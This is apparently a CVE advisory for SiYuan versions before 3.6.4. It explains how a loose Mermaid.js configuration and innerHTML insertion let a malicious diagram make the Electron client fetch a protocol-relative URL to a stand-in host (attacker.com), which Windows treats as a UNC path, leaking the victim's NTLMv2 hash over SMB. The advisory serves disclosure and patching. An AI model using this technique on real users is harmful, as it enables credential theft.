CVE-2026-40107

Name of the Vulnerable Software and Affected Versions SiYuan versions prior to 3.6.4

Description SiYuan, a personal knowledge management system, prior to version 3.6.4, configured Mermaid.js with 'securityLevel: "loose"' and 'htmlLabels: true'. This configuration allowed tags with 'src' attributes to bypass internal sanitization and be injected into SVG blocks. The SVG was then injected using innerHTML without further sanitization. When a user opened a note containing a malicious Mermaid diagram, the Electron client fetched the URL. On Windows systems, a protocol-relative URL (//attacker.com/image.png) was interpreted as a UNC path (attacker.comimage.png), triggering automatic SMB authentication and potentially sending the victim's NTLMv2 hash to the attacker.

Recommendations Update SiYuan to version 3.6.4 or later.